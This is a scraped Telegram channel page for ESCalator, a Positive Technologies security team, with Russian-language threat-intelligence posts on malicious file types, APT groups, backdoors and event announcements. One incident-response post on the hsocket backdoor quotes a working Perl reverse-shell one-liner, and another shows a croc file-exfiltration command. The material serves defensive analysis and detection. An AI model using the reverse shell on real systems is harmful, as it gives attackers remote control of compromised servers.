ar
Feedback
ESCalator

ESCalator

الذهاب إلى القناة على Telegram

Tips and tricks от команды экспертного центра безопасности Positive Technologies (PT ESC)

إظهار المزيد
8 093
المشتركون
+2524 ساعات
+597 أيام
+10030 أيام

جاري تحميل البيانات...

جذب المشتركين
سبتمبر '26
سبتمبر '26
+144
في 5 قنوات
أغسطس '26
+111
في 2 قنوات
Get PRO
يوليو '26
+337
في 11 قنوات
Get PRO
يونيو '26
+249
في 26 قنوات
Get PRO
مايو '26
+214
في 3 قنوات
Get PRO
أبريل '26
+261
في 6 قنوات
Get PRO
مارس '26
+289
في 6 قنوات
Get PRO
فبراير '26
+280
في 7 قنوات
Get PRO
يناير '26
+282
في 3 قنوات
Get PRO
ديسمبر '25
+328
في 7 قنوات
Get PRO
نوفمبر '25
+207
في 7 قنوات
Get PRO
أكتوبر '25
+1 645
في 5 قنوات
Get PRO
سبتمبر '25
+149
في 4 قنوات
Get PRO
أغسطس '25
+235
في 4 قنوات
Get PRO
يوليو '25
+324
في 17 قنوات
Get PRO
يونيو '25
+222
في 6 قنوات
Get PRO
مايو '25
+345
في 9 قنوات
Get PRO
أبريل '25
+299
في 14 قنوات
Get PRO
مارس '25
+618
في 25 قنوات
Get PRO
فبراير '25
+248
في 10 قنوات
Get PRO
يناير '25
+444
في 10 قنوات
Get PRO
ديسمبر '24
+234
في 4 قنوات
Get PRO
نوفمبر '24
+666
في 9 قنوات
Get PRO
أكتوبر '24
+416
في 8 قنوات
Get PRO
سبتمبر '24
+282
في 5 قنوات
Get PRO
أغسطس '24
+653
في 9 قنوات
Get PRO
يوليو '24
+1 144
في 3 قنوات
التاريخ
نمو المشتركين
الإشارات
القنوات
19 سبتمبر+15
18 سبتمبر+26
17 سبتمبر+10
16 سبتمبر+6
15 سبتمبر+9
14 سبتمبر+5
13 سبتمبر+9
12 سبتمبر+4
11 سبتمبر+5
10 سبتمبر+18
09 سبتمبر+2
08 سبتمبر+1
07 سبتمبر+5
06 سبتمبر+4
05 سبتمبر+12
04 سبتمبر+5
03 سبتمبر+4
02 سبتمبر+3
01 سبتمبر+1
منشورات القناة

2
.exe .docm .xlsm Вредоносные файлы с этими расширениями чаще всего встречаются в сетевом трафике компаний. Давайте базово раз
.exe .docm .xlsm Вредоносные файлы с этими расширениями чаще всего встречаются в сетевом трафике компаний. Давайте базово разберемся, почему. 🖥 .exe — классическое расширение исполняемых файлов в Windows: двойной клик — и у вас запускается Fortnite (не осуждаем), браузер, ваш любимый мессенджер, установщик или любая другая программа. А может запуститься и Trojan или какой-нибудь другой вредонос. Чаще всего вы даже не видите, что у файла именно такое расширение: по умолчанию в Windows включена функция «Скрывать расширения для зарегистрированных типов файлов», из-за чего видно только первую часть имени. И этим пользуются злоумышленники. Например, они маскируют файл под что-нибудь безобидное: вместо zarplaty_sep_2026.pdf.exe вы увидите просто zarplaty_sep_2026.pdf. Подозрений не вызывает, а интерес пробуждает. Клац-клац — и бамц. В общем, для самозащиты рекомендуем отключить эту функцию. Делается просто, зато вы всегда будете знать, на что именно кликаете. 📄 .docm и .xlsm — а это знакомые всем офисным работягам расширения документов Microsoft Office. Их часто перекидывают по электронной почте, чатам и флешкам, так что обычно они не вызывают подозрений. Только что-то тут с последними буквами расширений не так — скажете вы, и будете правы. Вместо x в конце здесь стоит m, а это означает, что такие документы поддерживают макросы — небольшие программы на специальном языке VBA, которые могут выполнять действия внутри документа. Также могут попадаться расширения .dotm и .xltm — это шаблоны документов с поддержкой макросов. И так же, как с .exe, эти расширения по умолчанию скрыты в наименовании файлов в Windows, поэтому вы просто видите иконку документа и его название. Макросы — полезная штука, которая помогает автоматизировать рутинные действия в документах (с их помощью энтузиасты даже умудрились запустить DOOM прямо в Word). Но ими пользуются и злоумышленники: вы открываете вроде бы обычный файл, разрешаете макросы — и на вашем компьютере выполняются заложенные в них команды. Например, они могут запустить системную команду, которая загрузит и запустит другой вредонос. Так вот, к чему мы это решили объяснить 1️⃣ Внимательно следите за тем, что именно вы запускаете и какие разрешения даете. 2️⃣ Наши эксперты с помощью песочницы PT Sandbox проанализировали вредоносную активность, выявленную PT NAD в сетевом трафике организаций с октября 2025 года по июль 2026 года. И как раз 29% опасных файлов оказались с расширением .exe, а 26% — с расширениями Microsoft Office. 3️⃣ Как вы понимаете, эти файлы — только верхушка айсберга из вредоносов. Ниже в сетях были обнаружены и потенциально опасные инструменты, которые выглядят легитимно, различные вариации архивов и более интересные находки. О них — в полной версии исследования на нашем сайте. @ptescalator
1 442
3
TLP: POSITIVE RED №2 25 сентября проведем наш второй митап, на этот раз — в Музее криптографии (55.830677, 37.597678). Будут
TLP: POSITIVE RED №2 25 сентября проведем наш второй митап, на этот раз — в Музее криптографии (55.830677, 37.597678). Будут честные доклады без записи, живое общение и никакой воды (только пенное, снова). Если вы аналитик SOC, специалист по реагированию и расследованию инцидентов или эксперт по исследованию и детектированию угроз, то вам точно зайдет. Программа на вечер (встречаемся в 18:30): 🕖 19:00 — «От инфоповода до атаки: как группировки адаптируют глобальную и российскую повестку под свои операции». Денис Казаков, специалист группы киберразведки PT ESC. 🕢 19:30 — «VantaCore: как вымогатели собирают собственный арсенал». Александр Гантимуров, руководитель направления обратной разработки Angara MTDR. 🕣 20:30 — «История про шифровальщик, который не смог». Дмитрий Логинов, реверс-инженер, CICADA8. 🕘 21:00 — «Follow the __report, knock knock, Remedy». Иван Трофименко, аналитик центра мониторинга и реагирования JET CSIRT. 🕤 21:30 — обсудим томатный гозе и другие важные вопросы. Количество мест ограничено, регистрируйтесь заранее на нашем сайте. @ptescalator
7 376
4
لا يوجد نص...
2 654
5
لا يوجد نص...
3 032
6
Din, din — кто там? 🔔 Группа киберразведки экспертного центра безопасности Positive Technologies обнаружила новую группировк
Din, din — кто там? 🔔 Группа киберразведки экспертного центра безопасности Positive Technologies обнаружила новую группировку, которую мы назвали DENOmination Group. В 2026 году мы зафиксировали ее активность против российских организаций оборонно-промышленного, военного, финансового и консалтингового секторов. Ключевая особенность атак — использование легитимной среды выполнения Deno для запуска вредоносного JavaScript/TypeScript-кода. В исследованных цепочках мы наблюдали загрузчик DinDoor, агент удаленного доступа DenoRAT, вредоносные MSI- и LNK-файлы, ротацию C2-инфраструктуры и несколько связанных способов первоначальной доставки. Пересечения в кодовой базе, конфигурационных параметрах, логике построения цепочек и сетевой инфраструктуре позволили связать наблюдаемые эпизоды с активностью одной группировки. В исследовании разобрали архитектуру DinDoor и DenoRAT, механизмы закрепления и взаимодействия с C2, инфраструктурные пересечения, TTP и возможную модель использования общей платформы несколькими операторами. Подробности — в нашем блоге 🦖 #TI #APT #Malware @ptescalator
2 505
7
Он вам не gsocket 😑 В ходе расследования одного из инцидентов специалисты PT ESC IR наткнулись на весьма диковинный инструме
Он вам не gsocket 😑 В ходе расследования одного из инцидентов специалисты PT ESC IR наткнулись на весьма диковинный инструмент hsocket (не путать с gsocket). После получения первоначального доступа и установки веб-шелла злоумышленники доставили на скомпрометированный веб-сервер три bash-скрипта. 1️⃣ hsocket — бэкдор, имеющий следующий функционал: • запуск интерактивной командной оболочки • запуск эксплойтов для повышения привилегий в Linux-системах (PwnKit, Dirty Pipe, Dirty COW, Netfilter) • сканирование директории на наличие веб-шеллов и их удаление (вероятно, для очистки следов) • защита файлов от удаления • установление reverse shell-соединения с управляющим сервером с помощью кода на Perl: perl -e "use Socket;\$i=\"$hsHOST\";\$p=$hsPORT;socket(S,PF_INET,SOCK_STREAM, getprotobyname('tcp'));if(connect(S,sockaddr_in(\$p,inet_aton(\$i)))){ open(STDIN,'>&S');open(STDOUT,'>&S');open(STDERR,'>&S');exec('sh -i');};" • скачивание и запуск скриптов для поиска ошибок в конфигурации Linux и повышения привилегий (linenum, linpeas) 2️⃣ hfsm — файловый менеджер, который позволяет интерактивно работать с файловой системой: просматривать, редактировать и удалять файлы. 3️⃣ .hsrc — устанавливает полные права на чтение, запись и исполнение файлов hsocket и hfsm, а также создаёт алиасы для запуска данных скриптов. В рамках данного исследования нам удалось обнаружить статью, написанную на индонезийском языке, в которой было описано данное ВПО. Что интересно, веб-шелл, установленный на скомпрометированном сервере, также содержал комментарии и строки на индонезийском: // Fungsi untuk tampilan halaman login $Warning = "### ⚠️Info!! Terdekteksi Aktivitas Dari"; Сам веб-шелл является модифицированной версией Gecko. Об этом говорят комментарии и характерные строки кода: //------------------GECKO SHELL, RECODED BY AYANA--------------------// <!-- Gecko Folder File Manager --> IoC: hsocket.io /tmp/hs-data/ #ir #dfir #detect #ioc #malware @ptescalator
2 504
8
لا يوجد نص...
3 113
9
We will croc you 👻 PhantomCore продолжает активно использовать ошибки в конфигурации 1С для атак на российские организации.
We will croc you 👻 PhantomCore продолжает активно использовать ошибки в конфигурации 1С для атак на российские организации. Об атаках на 1С с помощью 1cshell мы писали ранее (1, 2, 3). В рамках расследования инцидента команда PT ESC IR обнаружила компрометацию сервера 1С, работающего на операционной системе семейства Linux 🐧 Среди характерных признаков — наличие вредоносных исполняемых файлов в подкаталогах домашней директории служебного пользователя usr1cv8 и команд в .bash_history того же пользователя — в частности просмотр и удаление файла res.txt, в который записывается результат выполнения кода посредством 1cshell. /home/usr1cv8/.bash_history: cat res.txt /home/usr1cv8/.bash_history: rm res.txt После получения доступа в систему PhantomCore установили ReverseSSH-туннель, что является типичным поведением для данной группировки. 🕵️‍♂️ Помимо часто используемого инструментария, мы встретили и более диковинную утилиту croc, предназначенную для удаленной загрузки и эксфильтрации файлов. На исследуемом узле были обнаружены команды формата: CROC_SECRET=[REDACTED] ./croc С помощью нее злоумышленники могли загрузить на скомпрометированный узел файл, который был предварительно отправлен через веб-интерфейс https://getcroc.com/ (на скриншоте) или с другого компьютера, на котором установлен croc. 💡 Для поиска следов использования croc можно поискать исполняемый файл с соответствующим именем, а также использование переменной окружения CROC_SECRET. В качестве сетевого индикатора может служить домен getcroc.com. #ir #tip #apt #detect #dfir @ptescalator
3 431
10
لا يوجد نص...
3 748
11
لا يوجد نص...
4 769
12
Минус один пернатый вор — плюс сто очков рейтинга! 😵 Команда Threat Intelligence экспертного центра безопасности Positive Te
Минус один пернатый вор — плюс сто очков рейтинга! 😵 Команда Threat Intelligence экспертного центра безопасности Positive Technologies обнаружила кампанию восточноазиатской группировки FamousSparrow. Группировка использовала новый бэкдор, который мы назвали SquawkDoor, а также новую версию известного бэкдора SparrowDoor 🏴‍☠️ Группировка встраивала вредоносные JS-скрипты на сайты из разных стран. Они показывали пользователю якобы ошибку сертификата на определенном языке и предлагали скачать новый сертификат, который являлся MSI-файлом и приводил к заражению вредоносным бэкдором. 😳 Мы проанализировали бэкдоры: подробно показали новый SquawkDoor и провели детальный анализ отличий нового SparrowDoor от старой версии, а также связанных с ними HemiGate, TernDoor и CrowDoor. Помимо этого, мы нашли различные пересечения с другими злоумышленниками из Восточной Азии. Также в процессе анализа мы обнаружили связанного с группой пентестера, который готовил атаки. О том, какие приложения ранее взламывал злоумышленник и какие у него фетиши — читайте в нашем блоге 😏 #TI #APT #Malware @ptescalator
3 885
13
DragonDoll: матрешка в мире Android-шпионов 🪆 В начале этой весны специалисты PT ESC обнаружили неизвестный ранее APK-файл,
DragonDoll: матрешка в мире Android-шпионов 🪆 В начале этой весны специалисты PT ESC обнаружили неизвестный ранее APK-файл, загруженный из Саудовской Аравии. Сам образец содержал много приемов Defense Evasion. Для усложнения анализа было использовано: • 1 техника BadPack • 2 этапа загрузки нативных библиотек • 1 обфускация на основе LLVM • 6 проверок на выполнение в виртуальной среде • и несчитанное количество MBA-выражений После долгих страданий этапов анализа, с помощью сил эмуляции, законов булевой алгебры и нескольких сотен строк кода наши специалисты распаковали новый Android-шпион DragonDoll 📱 В ходе исследования мы наткнулись на масштабную атаку с участием данного ВПО, направленную на пользователей Android из более чем 26 стран, включая и Россию. Злоумышленники использовали GitHub как источник распространения и постоянного обновления DragonDoll. Ссылка на этот репозиторий привела на сеть поддельных сайтов с «обновлением» Chrome, содержание которых адаптировалось под язык жертвы. Разбор того, что лежало под слоем обфускации — в нашем блоге ⬅️ #TI #Android #Malware @ptescalator
3 927
14
لا يوجد نص...
3 492
15
Едем на OFFZONE 2026 На этой неделе постов не было, зато на следующей — выступим с докладами на OFFZONE. Если будете, то захо
Едем на OFFZONE 2026 На этой неделе постов не было, зато на следующей — выступим с докладами на OFFZONE. Если будете, то заходите. А если не зайдете, то получите потом записи, но не все. ➡️ «Девиртуализация Warbird с помощью LLVM» / 20 августа, 14:00 Warbird — это внутренняя, официально недокументированная технология Microsoft для защиты кода и DRM. Мало кто знает, но Warbird также имеет виртуализацию, реализованную в нескольких компонентах ядра Windows: ci.dll, clipsp.sys и peauth.sys. На докладе Павел Максютин, ведущий специалист отдела экспертизы PT Sandbox, расскажет о современных подходах к девиртуализации, об устройстве виртуальной машины Warbird и как ему удалось ее сломать с помощью бинарной трансляции и LLVM. ➡️ Et tu, OpenCode: как злоумышленники атакуют агентов и выманивают ваши секреты / 20 августа, 16:10 Наступление эры агентских систем «подарило» злоумышленникам новые векторы атак на пользователей. Чего они добиваются и какие новые техники используют в отношении ассистентов и агентов, расскажет Станислав Раковский, руководитель группы Supply Chain Security. А еще будет практическая проверка того, насколько безопасно использовать ревью коммитов на основе опенсорсных и коммерческих LLM. ➡️ Дочирикались / 21 августа, 16:30 Название доклада отсылает к одной восточноазиатской группировке, которая атаковала цели в Южной Азии и Европе. Злоумышленники внедряли на взломанные легитимные сайты вредоносный JS, подменявший страницы фейковой установкой сертификата и загружавший ранее неизвестный бэкдор. Максим Шаманов и Александр Бадаев, специалисты TI-департамента PT ESC, расскажут о серьезных OPSEC-ошибках, которые допустили злоумышленники. Будут и другие доклады от ребят из Позитива — про них в этом посте 😠 @ptescalator
3 971
16
В международный день пенного самое время спросить…
4 226
17
⚡Фейковые новости — В С Ё Специалисты PT ESC обнаружили связанную между собой сеть новостных сайтов, почтовых доменов и аккау
⚡Фейковые новости — В С Ё Специалисты PT ESC обнаружили связанную между собой сеть новостных сайтов, почтовых доменов и аккаунтов в социальных сетях, которые использовались для распространения фейковых новостей. Подавляющее большинство обнаруженных новостных ресурсов и доменов для отправки писем были зарегистрированы на один и тот же email-адрес ✉️ Сайты и аккаунты в соцсетях в основном маскировались под региональные новостные площадки, а распространяемые через них фейковые материалы часто пересекались между разными ресурсами. Кроме того, мы обнаружили возможную связь этой инфраструктуры с группировкой Rare Werewolf. Ранее она также использовала похожую тактику на начальном этапе атак — рассылала письма без какой-либо полезной нагрузки. Подробнее о расследовании можно прочитать в нашем блоге 🗞 #TI #APT #FakeNews #Phishing @ptescalator
5 110
18
لا يوجد نص...
4 696
19
لا يوجد نص...
1
20
لا يوجد نص...
5 218